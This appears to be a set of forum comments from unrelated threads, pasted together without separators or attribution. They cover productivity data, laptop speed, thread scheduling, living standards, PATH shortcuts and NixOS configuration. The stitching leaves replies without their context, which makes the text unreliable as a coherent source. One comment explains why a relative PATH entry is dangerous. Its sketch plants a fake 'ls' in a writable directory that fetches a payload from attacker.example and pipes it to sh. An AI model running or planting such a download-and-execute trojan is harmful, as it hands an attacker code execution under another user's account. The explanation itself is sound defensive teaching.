I read an article in the FT just a couple of days ago claiming that increased productivity is becoming visible in economic data:
> My own updated analysis suggests a US productivity increase of roughly 2.7 per cent for 2025. This is a near doubling from the sluggish 1.4 per cent annual average that characterised the past decade.
I think you're bringing up a great question here. If you ask a random person on the street "is your laptop fast?", the answer probably has more to do with what software that person is running than with what hardware they have.
My Apple silicon laptop feels super fast because I just open the lid and it's running. That's not because the CPU runs instructions super fast; it's because I can just close the lid and the battery lasts forever.
My guess would be that ARM Chromebooks run substantially more cut-down firmware, while Intel machines need a more full-fat EFI stack? But I haven't used either and am just speculating.
I think in the OP's example, the work is not useless. They're saying that if you had a system doing the same work with maybe 60 processes, you're better off splitting that into 600 processes and a couple thousand threads, since that allows granular classification of tasks by their latency sensitivity.
But it is. He's talking about real systems with real processes in a generic way, not a singular hypothetical where suddenly all that work must be done, so you can also apply your general knowledge that some of those background processes aren't useful (but can't even be disabled due to system lockdown).
I think you're right that the article didn't provide criteria for when this type of system is better or worse than another. For example, the cost of splitting work into threads and of switching between threads needs to be factored in. If that cost is very high, then the multi-threaded system could very well be worse. And there are other factors too.
However, given the trend in modern software engineering of breaking work into units, and the fact that thread switches are very fast on modern hardware, being able to distribute that work across compute clusters that make different optimization choices is a good thing and lets schedulers get closer to optimal results.
So really it boils down to this: if the gains from doing the work on different compute outweigh the cost of splitting and distributing it, it's a win. And for most modern software on most modern hardware, the win is very significant.
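For a concrete flavor of what classifying tasks by latency sensitivity can look like, here's a minimal sketch on Linux using util-linux tools (the ./indexer binary and the core IDs are hypothetical; which cores form the efficiency cluster varies by machine):

    # let a background indexer run only when nothing latency-sensitive
    # wants the CPU (SCHED_IDLE requires priority 0)
    chrt --idle 0 ./indexer &

    # or pin it to the efficiency-core cluster, keeping the
    # performance cores free for interactive work
    taskset -c 4-7 ./indexer &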
> (...) a singular hypothetical where suddenly all that work must be done (...)
This is far from hypothetical. It is an accurate description of your average workstation. I recommend you casually check the list of processes running at any given moment on any random desktop or laptop you find in a 5 meter radius.
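For example, on Linux with procps:

    ps -e --no-headers | wc -l    # number of processes
    ps -eL --no-headers | wc -l   # number of threads (LWPs)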
I've done more than that: after noticing high CPU use, I investigated what those processes do, discovered services that I never need, and tried to disable them. Now try to actually prove your point.
It's true, they don't "make 'em like they used to". They make them in new, more efficient ways, which have contributed to improving global trends in metrics such as literacy, child mortality, life expectancy, extreme poverty, and food supply.
If you are arguing that the standard of living today is lower than in the past, I think that is a very steep uphill battle.
If your worries are about ecology and sustainability, I agree that is a concern we need to address more effectively than we have in the past. Technology will almost certainly be part of that solution via things like fusion energy. Success is not assured, and we cannot just sit back and say "we live in the best of all possible worlds with a glorious manifest destiny", but I don't think the future is particularly bleak compared to the past.
I worry that humanity has a track record of diving head first into new technologies without worrying about externalities like the environment or job displacement.
I wish we were more thoughtful and focused more on minimizing the downsides of new technologies.
Instead it seems we're headed full steam towards huge amounts of energy use and job displacement, and the main bonus is that rich people get richer.
I’m not sure if having software be cheaper is beneficial. Is it good for malware to be easier to produce? I’d personally choose higher quality software over more software.
I’m not convinced cheaper mass produced clothing has been a net positive. Will AI be a positive? Time will tell. In the short term there are some obvious negatives.
> If you are arguing that the standard of living today is lower than in the past, I think that is a very steep uphill battle
We'd first have to agree on a definition of "standard of living". There are certainly many aspects (important to me) in which we have regressed, and being able to buy cheap tech crap does not make up for it.
One could set an env var pointing to a local bin dir that is otherwise not in the PATH, like L=/home/ahepp/.local/bin, and then run $L/mycommand. That doesn't meet the OP's requirement of no shift key, though.
Or prefix files in the local bin dir with a couple of letters from your username, like /home/ahepp/.local/bin/ah-mycommand.
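A minimal sketch of both tricks, reusing the paths from above (L, mycommand, and the ah- prefix are just illustrative names):

    # trick 1: dir stays out of PATH, reach it via a short env var
    export L=/home/ahepp/.local/bin
    $L/mycommand                   # works, but $ needs the shift key

    # trick 2: dir stays in PATH, commands get a username prefix
    mv ~/.local/bin/mycommand ~/.local/bin/ah-mycommand
    ah-mycommand                   # no shift key required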
I think it's substantially riskier. At the very least, it means you are trusting any directory you cd into, rather than just trusting your $HOME/bin.
Stuff that would not typically raise eyebrows has been made risky. You might cd into a less privileged user's $HOME, or some web service's data directory, and suddenly you've given whoever had access to those users access to your user.
Maybe you could argue "well, I just won't cd outside of my $HOME", but the sheer unexpectedness of the behavior seems deeply undesirable to me.
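A sketch of the failure mode, assuming a relative entry like "." ended up on your PATH (the paths and attacker.example are hypothetical):

    # attacker, who can write to the web service's data directory:
    cat > /srv/webapp/data/ls <<'EOF'
    #!/bin/sh
    curl -s https://attacker.example/payload | sh   # runs with *your* privileges
    exec /bin/ls "$@"                               # then behaves like normal ls
    EOF
    chmod +x /srv/webapp/data/ls

    # you, later:
    cd /srv/webapp/data
    ls    # the shell resolves ./ls first; the payload runs silently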
NixOS smooths the path to using absolute paths while putting some (admittedly minor) speed bumps in the way of avoiding them. If you package something up that uses relative paths, it will probably break for someone else relatively quickly.
What that means is that you end up with a system in which absolute paths are used almost everywhere.
This is why the killer feature of NixOS isn't that you can configure things from a central place (Red Hat had a tool to do that at least 25 years ago). It's that, since most of /etc is read-only, you must configure everything from a central place, which has two important effects:
1. The tool for configuring things in a central place can be much simpler, since it doesn't have to worry about people changing things out from under it.
2. Any time someone runs into something that is painful with the tool for configuring things in a central place, they have to improve the tool (or abandon NixOS).
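You can see the mechanism on any NixOS box: files under /etc are read-only symlinks into the store (the exact output below is illustrative):

    $ readlink -f /etc/ssh/sshd_config
    /nix/store/<hash>-etc-sshd_config    # hash elided; it lives in the read-only store
    $ echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config
    bash: /etc/ssh/sshd_config: Permission denied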
I don't believe that's consistent with the data:
https://fred.stlouisfed.org/series/MEHOINUSA672N